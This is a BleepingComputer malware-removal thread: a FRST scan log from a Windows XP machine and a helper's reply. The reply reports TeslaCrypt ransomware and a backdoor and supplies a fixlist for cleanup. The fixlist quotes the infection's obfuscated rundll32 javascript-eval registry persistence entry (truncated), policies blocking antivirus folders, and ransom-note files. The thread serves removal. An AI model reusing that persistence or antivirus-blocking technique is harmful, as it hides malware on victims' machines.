CustomCLSID: HKU\S-1-5-21-484763869-1604221776-1801674531-500_Classes\CLSID\{6A221957-2D85-42A7-8E19-BE33950D1DEB}\localserver32 -> C:\Program Files\Autodesk\DWG TrueView 2013\dwgviewr.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-484763869-1604221776-1801674531-500_Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\localserver32 -> C:\WINDOWS\system32\wbem\wmiprvse.exe (Microsoft Corporation)

==================== Restore Points =========================

01-03-2015 13:16:00 System Checkpoint
01-03-2015 13:36:03 Software Distribution Service 3.0
01-03-2015 14:41:56 Installed AVG 2015
01-03-2015 14:43:01 Installed AVG 2015
01-03-2015 19:01:31 Software Distribution Service 3.0
02-03-2015 15:26:26 Removed Call of Duty® 4 - Modern Warfare™
03-03-2015 15:48:27 System Checkpoint
03-03-2015 19:00:16 Software Distribution Service 3.0
04-03-2015 19:00:22 Software Distribution Service 3.0
05-03-2015 19:00:17 Software Distribution Service 3.0
07-03-2015 17:41:25 Software Distribution Service 3.0
07-03-2015 19:00:19 Software Distribution Service 3.0
08-03-2015 18:00:20 Software Distribution Service 3.0
09-03-2015 18:38:35 Software Distribution Service 3.0
09-03-2015 20:53:24 Software Distribution Service 3.0
10-03-2015 18:00:58 Software Distribution Service 3.0
10-03-2015 19:18:17 Software Distribution Service 3.0

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-10-01 12:34 - 2014-03-10 23:02 - 00000855 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Logon.job => C:\WINDOWS\system32\xp_eos.exe
Task: C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Monthly.job => C:\WINDOWS\system32\xp_eos.exe
Task: C:\WINDOWS\Tasks\MsgUpdateCheck (de5e9f60-5adf-404f-9048-3ab8bfd91685).job => C:\SmartDraw CI\MarkedUp\tray\TrayNotifierNET35.exe
Task: C:\WINDOWS\Tasks\PC Performer Scheduled Scan.job => C:\Program Files\PC Performer\PCPerformer.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\SDMsgUpdate (Local).job => C:\SMARTD~1\Messages\SDNotify.exe`-PLocal -V21020405 -SSDNI.ini -A -Mhttp:/www.smartdraw.com/msgs/messagecheck.asp
Task: C:\WINDOWS\Tasks\SDMsgUpdate (TE).job => C:\SMARTD~1\Messages\SDNotify.exe\-PTE -V21020405 -SSDU.ini -A -Mhttp:/www.smartdraw.com/msgs/messagecheck.asp

==================== Loaded Modules (whitelisted) ==============

2009-09-06 12:10 - 2009-12-28 16:17 - 00066872 _____ () C:\WINDOWS\system32\PnkBstrA.exe
2008-09-22 15:41 - 2008-09-22 15:41 - 00564496 _____ () C:\Program Files\Common Files\LogiShrd\LComMgr\Communications_Helper.exe
2015-02-02 17:14 - 2014-10-20 08:36 - 00936656 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\Viber.exe
2015-03-10 19:09 - 2015-03-10 19:09 - 49471488 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\libViber.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00770048 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\libGLESv2.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00106496 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\qfacebook.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00172032 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\exif.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00049152 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\libEGL.dll
2008-04-14 06:42 - 2008-04-14 06:42 - 00014336 _____ () C:\WINDOWS\system32\msdmo.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00876544 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\platforms\qwindows.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00024576 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qgif.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00024576 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qico.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00204800 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qjpeg.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00221184 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qmng.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00016384 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qsvg.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00016384 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qtga.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00311296 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qtiff.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00016384 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qwbmp.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00638976 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\sqldrivers\qsqlite.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00032768 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\iconengines\qsvgicon.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SCT_SKMScan => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CleanHlp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CleanHlp.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCT_SKMScan => ""="Service"

==================== EXE Association (whitelisted) ===============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-484763869-1604221776-1801674531-1004\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-484763869-1604221776-1801674531-500\Control Panel\Desktop\\Wallpaper ->
DNS Servers: Media is not connected to internet.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== Accounts: =============================

Administrator (S-1-5-21-484763869-1604221776-1801674531-500 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\Administrator
ASPNET (S-1-5-21-484763869-1604221776-1801674531-1003 - Limited - Enabled)
Guest (S-1-5-21-484763869-1604221776-1801674531-501 - Limited - Enabled)
HelpAssistant (S-1-5-21-484763869-1604221776-1801674531-1000 - Limited - Disabled)
michelle coe (S-1-5-21-484763869-1604221776-1801674531-1004 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\michelle coe
SUPPORT_388945a0 (S-1-5-21-484763869-1604221776-1801674531-1002 - Limited - Disabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/10/2015 07:18:33 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: )
Description: HRESULT:0x80070643
Description:. 0x80070643. Fatal error during installation.

Error: (03/10/2015 07:18:33 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Security Client -- All customizable parameters must be specified on install: AMPRODUCT, PRODUCTICON, PRODUCTLOCALIZEDNAME, REMEDIATIONEXE, SIGNATURECATEGORYID and PRODUCT_SKU(NULL)(NULL)(NULL)(NULL)

Error: (03/10/2015 06:03:42 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: )
Description: HRESULT:0x80070643
Description:. 0x80070643. Fatal error during installation.

Error: (03/10/2015 06:03:41 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Security Client -- All customizable parameters must be specified on install: AMPRODUCT, PRODUCTICON, PRODUCTLOCALIZEDNAME, REMEDIATIONEXE, SIGNATURECATEGORYID and PRODUCT_SKU(NULL)(NULL)(NULL)(NULL)

Error: (03/09/2015 08:53:34 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: )
Description: HRESULT:0x80070643
Description:. 0x80070643. Fatal error during installation.

Error: (03/09/2015 08:53:34 PM) (Source: MsiInstaller) (EventID: 10005) (User: NICK)
Description: Product: Microsoft Security Client -- All customizable parameters must be specified on install: AMPRODUCT, PRODUCTICON, PRODUCTLOCALIZEDNAME, REMEDIATIONEXE, SIGNATURECATEGORYID and PRODUCT_SKU(NULL)(NULL)(NULL)(NULL)

Error: (03/09/2015 06:38:45 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: )
Description: HRESULT:0x80070643
Description:. 0x80070643. Fatal error during installation.

Error: (03/09/2015 06:38:44 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Security Client -- All customizable parameters must be specified on install: AMPRODUCT, PRODUCTICON, PRODUCTLOCALIZEDNAME, REMEDIATIONEXE, SIGNATURECATEGORYID and PRODUCT_SKU(NULL)(NULL)(NULL)(NULL)

Error: (03/08/2015 06:00:34 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: )
Description: HRESULT:0x80070643
Description:. 0x80070643. Fatal error during installation.

Error: (03/08/2015 06:00:33 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Security Client -- All customizable parameters must be specified on install: AMPRODUCT, PRODUCTICON, PRODUCTLOCALIZEDNAME, REMEDIATIONEXE, SIGNATURECATEGORYID and PRODUCT_SKU(NULL)(NULL)(NULL)(NULL)


System errors:
=============
Error: (03/14/2015 00:51:26 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (03/14/2015 00:50:55 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (03/14/2015 00:50:24 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (03/14/2015 00:49:12 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (03/14/2015 00:48:41 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (03/14/2015 00:48:10 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (03/14/2015 00:47:10 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The X10 Device Network Service service failed to start due to the following error:
%%1069

Error: (03/14/2015 00:47:10 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The x10nets service was unable to log on as .\Administrator with the currently configured
password due to the following error:
%%1326

To ensure that the service is
configured properly, use the Services snap-in in Microsoft Management
Console (MMC).

Error: (03/14/2015 00:47:10 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Microsoft Antimalware Service service terminated with the following error:
%%2147942402

Error: (03/10/2015 07:18:35 PM) (Source: Windows Update Agent) (EventID: 20) (User: )
Description: Installation Failure: Windows failed to install the following update with error 0x80070643: Update for Microsoft Security Essentials - 4.4.304.0 (KB2902885).


Microsoft Office Sessions:
=========================
Error: (01/14/2015 07:12:37 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6691.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 5190 seconds with 2640 seconds of active time. This session ended with a crash.

Error: (01/16/2014 07:48:18 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6680.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 533193 seconds with 540 seconds of active time. This session ended with a crash.

Error: (05/19/2013 06:27:44 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 688796 seconds with 840 seconds of active time. This session ended with a crash.

Error: (09/18/2011 00:41:20 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6562.5003, Microsoft Office Version: 12.0.6425.1000. This session lasted 3493 seconds with 300 seconds of active time. This session ended with a crash.

Error: (06/17/2011 06:34:17 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6557.5001, Microsoft Office Version: 12.0.6425.1000. This session lasted 6949 seconds with 360 seconds of active time. This session ended with a crash.

Error: (01/06/2011 03:46:31 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6548.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 27 seconds with 0 seconds of active time. This session ended with a crash.

Error: (10/07/2010 04:12:49 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6539.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 1243 seconds with 0 seconds of active time. This session ended with a crash.

Error: (05/11/2010 03:22:29 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6514.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 114 seconds with 60 seconds of active time. This session ended with a crash.

Error: (05/07/2010 01:17:41 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 13, Application Name: Microsoft Office OneNote, Application Version: 12.0.6500.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 4 seconds with 0 seconds of active time. This session ended with a crash.

Error: (02/11/2010 05:03:46 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6514.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 616 seconds with 480 seconds of active time. This session ended with a crash.


==================== Memory info ===========================

Processor: Intel® Core™2 Duo CPU E8200 @ 2.66GHz
Percentage of memory in use: 38%
Total physical RAM: 2046.42 MB
Available physical RAM: 1249.58 MB
Total Pagefile: 3938.73 MB
Available Pagefile: 3285.3 MB
Total Virtual: 2047.88 MB
Available Virtual: 1916.87 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:149 GB) (Free:93.25 GB) NTFS ==>[Drive with boot components (Windows XP)]
Drive e: (OLD HardDrive) (Fixed) (Total:74.52 GB) (Free:16.5 GB) NTFS ==>[Drive with boot components (Windows XP)]
Drive f: () (Removable) (Total:7.25 GB) (Free:7.25 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows XP) (Size: 149 GB) (Disk ID: D0D4D0D4)
Partition 1: (Active) - (Size=149 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 74.5 GB) (Disk ID: 6EDF6EDF)
Partition 1: (Active) - (Size=74.5 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 7.3 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=7.3 GB) - (Type=0B)

==================== End Of Log ============================



Edited by Oh My!, 18 March 2015 - 10:02 AM.
Posted Attach.txt




#2 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,414 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:11:36 PM

Posted 18 March 2015 - 10:12 AM

Greetings sportsfroma2 and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that. :thumbup2:

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met. :)
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • When you post your reply, use the Replytopic.jpg button instead.
  • In the upper right hand corner of the topic you will see the Followtopic.jpg button. Click on this then choose Immediate E-Mail notification and then Proceed and you will be sent an email once I have posted a response.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
  • Now let's get started :thumbup2:
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far. I have some steps for you to take but unfortunately I must first advise you that your files have been encrypted by the TeslaCrypt Ransomware and we will not be able to decrypt your files here. In addition, I would like to inform you of this malware's BackDoor Component.

===================================================

BACKDOOR WARNING!

--------------------

One or more of the identified infections is a Backdoor Trojan.

This allows hackers to remotely control your computer, steal critical system information and download and execute files.

I would counsel you to disconnect this PC from the Internet immediately. If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable. Please let me know if you have already noticed evidence of financial institution irregularities. Those accounts should be monitored from this point forward.

Though the trojan has been identified and can be killed, because of its backdoor functionality, your PC is very likely compromised and there is no way to be sure your computer can ever again be trusted. Many experts in the security community believe that once infected with this type of trojan, the best course of action would be a reformat and reinstall of the OS. Please read these for more information:

How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
When Should I Format, How Should I Reinstall
 

Here are some thoughts I have put together for people who ask what they should do in light of the infection. Ultimately each user must decide for themselves what to do and the below are things you might want to consider.

It is necessary for us to at least make you aware of the worst case scenario. This is because of the potential Backdoor Trojans bring with them, but it is not a determination on our part that your situation currently falls within this worst case scenario.

Ultimately it is a personal decision whether to reformat or not. What decision should you make to let you sleep well at night? It is different for different people. I will say whether rightly or wrongly most people decide to clean and not reformat, at least initially.

The only insight I can offer is how I evaluate the issue personally even though I have never had a Backdoor Trojan on my computer. One of the primary purposes for malicious software is to somehow separate you from your money. It seems reasonable to assume that a thief trying to take your money via a Backdoor Trojan will hit you hard, and quickly. Once your computer starts to act up and you become suspicious you have the opportunity to eliminate access to your computer and change the information taken, namely account and password information. The key to this, in my opinion, is whether or not you have noticed any irregularities in your banking or other financial institutions, or things like email and social network accounts (i.e. Facebook). If you have not seen any evidence of that then you may question whether your information has truly been stolen. If it seems it hasn't, and your critical information has been changed, it is reasonable to be more confident you are safe but you must stop short of claiming an absolute guarantee.

If, after careful consideration you decide not to reformat your computer it would be wise to continue monitoring your sensitive data and don't wait to address future symptoms on your computer which seem to be malware related.

The bottom line, the only way to be absolutely sure to be rid of a Backdoor Trojan is to reformat. The decision is yours.

Oh My!


We can still clean this machine but I can't guarantee that it will be 100% secure afterwards. Let me know what you decide to do. If you decide to go through with the cleanup, please proceed with the following steps.

===================================================

Farbar's Recovery Scan Tool - Run Fix in Normal or Safe Mode

--------------------
  • Press the Windows key + R on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it to your desktop (<<<Important) as fixlist.txt
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\SUPERAntiSpyware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Malwarebytes' Anti-Malware <====== ATTENTION
HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"ijpyf8\..\mshtml,RunHTMLApplication ";eval(")odv!@buhwdYNckdbu)#VRbshqu/Rid (the data entry has 362 more characters). <==== ATTENTION!
HKLM\...99B7938DA9E4}\LocalServer32: [a] rundll32.exe javascript:"ijpyf8\..\mshtml,RunHTMLApplication ";eval(")odv!@buhwdYNckdbu)#VRbshqu/Rid (the data entry has 28512 more characters). <==== ATTENTION!
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-484763869-1604221776-1801674531-500\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} ->  No File
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} ->  No File
S3 catchme; \??\C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\catchme.sys [X]
S1 exgjfwiw; \??\C:\WINDOWS\system32\drivers\exgjfwiw.sys [X]
S3 rt2870; system32\DRIVERS\rt2870.sys [X]
S1 SABKUTIL; \??\C:\Program Files\SUPERAntiSpyware\SABKUTIL.sys [X]
U3 TrueSight; \??\C:\WINDOWS\system32\TrueSight.sys [X]
2015-02-24 22:20 - 2015-02-25 03:34 - 87668868 _____ () C:\Documents and Settings\Administrator\Application Data\log.html
2015-02-24 22:20 - 2015-02-25 03:34 - 00000636 _____ () C:\Documents and Settings\Administrator\Application Data\key.dat
2015-02-20 17:15 - 2015-02-20 17:15 - 00008630 _____ () C:\HELP_DECRYPT.HTML
2015-02-20 17:15 - 2015-02-20 17:15 - 00004258 _____ () C:\HELP_DECRYPT.TXT
2015-02-20 17:15 - 2015-02-20 17:15 - 00000292 _____ () C:\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\Local Settings\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\michelle coe\My Documents\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\michelle coe\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\Local Settings\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\michelle coe\My Documents\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\michelle coe\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\Local Settings\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\michelle coe\My Documents\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\michelle coe\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\HELP_DECRYPT.URL
2015-02-20 16:59 - 2015-02-20 16:59 - 00008630 _____ () C:\Documents and Settings\michelle coe\Local Settings\HELP_DECRYPT.HTML
2015-02-20 16:59 - 2015-02-20 16:59 - 00008630 _____ () C:\Documents and Settings\michelle coe\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 16:59 - 2015-02-20 16:59 - 00004258 _____ () C:\Documents and Settings\michelle coe\Local Settings\HELP_DECRYPT.TXT
2015-02-20 16:59 - 2015-02-20 16:59 - 00004258 _____ () C:\Documents and Settings\michelle coe\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 16:59 - 2015-02-20 16:59 - 00000292 _____ () C:\Documents and Settings\michelle coe\Local Settings\HELP_DECRYPT.URL
2015-02-20 16:59 - 2015-02-20 16:59 - 00000292 _____ () C:\Documents and Settings\michelle coe\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 15:46 - 2015-02-20 15:46 - 00008630 _____ () C:\Documents and Settings\michelle coe\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:46 - 2015-02-20 15:46 - 00004258 _____ () C:\Documents and Settings\michelle coe\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:46 - 2015-02-20 15:46 - 00000292 _____ () C:\Documents and Settings\michelle coe\Application Data\HELP_DECRYPT.URL
2015-02-20 15:45 - 2015-02-20 15:45 - 00008630 _____ () C:\Documents and Settings\LocalService\Local Settings\HELP_DECRYPT.HTML
2015-02-20 15:45 - 2015-02-20 15:45 - 00008630 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:45 - 2015-02-20 15:45 - 00008630 _____ () C:\Documents and Settings\LocalService\HELP_DECRYPT.HTML
2015-02-20 15:45 - 2015-02-20 15:45 - 00004258 _____ () C:\Documents and Settings\LocalService\Local Settings\HELP_DECRYPT.TXT
2015-02-20 15:45 - 2015-02-20 15:45 - 00004258 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:45 - 2015-02-20 15:45 - 00004258 _____ () C:\Documents and Settings\LocalService\HELP_DECRYPT.TXT
2015-02-20 15:45 - 2015-02-20 15:45 - 00000292 _____ () C:\Documents and Settings\LocalService\Local Settings\HELP_DECRYPT.URL
2015-02-20 15:45 - 2015-02-20 15:45 - 00000292 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 15:45 - 2015-02-20 15:45 - 00000292 _____ () C:\Documents and Settings\LocalService\HELP_DECRYPT.URL
